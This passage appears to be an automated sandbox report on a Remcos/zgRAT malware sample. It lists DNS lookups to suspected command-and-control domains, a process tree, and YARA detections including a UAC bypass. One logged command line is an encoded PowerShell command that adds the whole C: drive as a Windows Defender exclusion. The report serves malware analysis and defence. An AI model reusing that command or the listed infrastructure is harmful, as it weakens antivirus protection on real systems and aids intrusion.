Jun 26, 2022 09:47:03.110609055 CEST	8.8.8.8	192.168.2.6	0x878c	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:04.133922100 CEST	8.8.8.8	192.168.2.6	0x9625	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:05.592148066 CEST	8.8.8.8	192.168.2.6	0x196a	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:05.879611015 CEST	8.8.8.8	192.168.2.6	0x5033	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:06.517442942 CEST	8.8.8.8	192.168.2.6	0x9f4e	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:07.788269043 CEST	8.8.8.8	192.168.2.6	0x74ca	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:09.216793060 CEST	8.8.8.8	192.168.2.6	0xd8f7	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:09.236004114 CEST	8.8.8.8	192.168.2.6	0xed77	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:09.571846008 CEST	8.8.8.8	192.168.2.6	0x8f1	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:10.603106976 CEST	8.8.8.8	192.168.2.6	0xbd0e	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:12.141793966 CEST	8.8.8.8	192.168.2.6	0x4e35	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:12.163436890 CEST	8.8.8.8	192.168.2.6	0xe8fa	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:12.589550972 CEST	8.8.8.8	192.168.2.6	0xbac1	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:13.621402979 CEST	8.8.8.8	192.168.2.6	0xad50	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:14.788824081 CEST	8.8.8.8	192.168.2.6	0xd077	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:15.098356962 CEST	8.8.8.8	192.168.2.6	0xfd7c	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:15.432835102 CEST	8.8.8.8	192.168.2.6	0x54e4	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:16.467267990 CEST	8.8.8.8	192.168.2.6	0xcfd7	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:17.630446911 CEST	8.8.8.8	192.168.2.6	0xf6a9	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:17.920314074 CEST	8.8.8.8	192.168.2.6	0xcfc1	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:18.181885004 CEST	8.8.8.8	192.168.2.6	0xc18	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:19.217360020 CEST	8.8.8.8	192.168.2.6	0x5d04	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.387876034 CEST	8.8.8.8	192.168.2.6	0x951d	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.411376953 CEST	8.8.8.8	192.168.2.6	0xad41	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:20.685486078 CEST	8.8.8.8	192.168.2.6	0x8a5b	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:21.717863083 CEST	8.8.8.8	192.168.2.6	0x549b	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:22.973720074 CEST	8.8.8.8	192.168.2.6	0x72df	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:22.995135069 CEST	8.8.8.8	192.168.2.6	0x123	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:23.260404110 CEST	8.8.8.8	192.168.2.6	0x5478	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:24.294061899 CEST	8.8.8.8	192.168.2.6	0xdd42	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.462004900 CEST	8.8.8.8	192.168.2.6	0xc3ae	Name error (3)	kalskala.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.483431101 CEST	8.8.8.8	192.168.2.6	0x699f	Name error (3)	tuekisaa.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:25.728574991 CEST	8.8.8.8	192.168.2.6	0xf0de	Server failure (2)	parthaha.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 26, 2022 09:47:26.764005899 CEST	8.8.8.8	192.168.2.6	0x28d	No error (0)	nikahuve.ac.ug		194.5.98.107	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: kyFBQxVbsg.exePID: 6232, Parent PID: 752

General

Target ID:	0
Start time:	09:44:41
Start date:	26/06/2022
Path:	C:\Users\user\Desktop\kyFBQxVbsg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kyFBQxVbsg.exe"
Imagebase:	0x2e0000
File size:	735232 bytes
MD5 hash:	972334F0C55D0AEAB0B32EFE41EA3470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6288, Parent PID: 6232

General

Target ID:	3
Start time:	09:44:48
Start date:	26/06/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Imagebase:	0xf10000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6424, Parent PID: 6288

General

Target ID:	5
Start time:	09:44:49
Start date:	26/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 2328, Parent PID: 6232

General

Target ID:	16
Start time:	09:45:54
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x60000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 6528, Parent PID: 6232

General

Target ID:	17
Start time:	09:45:55
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xae0000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Qerdo.exePID: 6216, Parent PID: 3688

General

Target ID:	19
Start time:	09:46:02
Start date:	26/06/2022
Path:	C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Imagebase:	0x40000
File size:	735232 bytes
MD5 hash:	972334F0C55D0AEAB0B32EFE41EA3470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Qerdo.exePID: 5652, Parent PID: 3688

General

Target ID:	24
Start time:	09:46:12
Start date:	26/06/2022
Path:	C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Imagebase:	0x9a0000
File size:	735232 bytes
MD5 hash:	972334F0C55D0AEAB0B32EFE41EA3470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 2592, Parent PID: 6216

General

Target ID:	25
Start time:	09:46:20
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xe0000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 5836, Parent PID: 6216

General

Target ID:	26
Start time:	09:46:22
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x5d0000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 4900, Parent PID: 5652

General

Target ID:	27
Start time:	09:46:23
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x260000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: InstallUtil.exePID: 6304, Parent PID: 5652

General

Target ID:	28
Start time:	09:46:25
Start date:	26/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x510000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
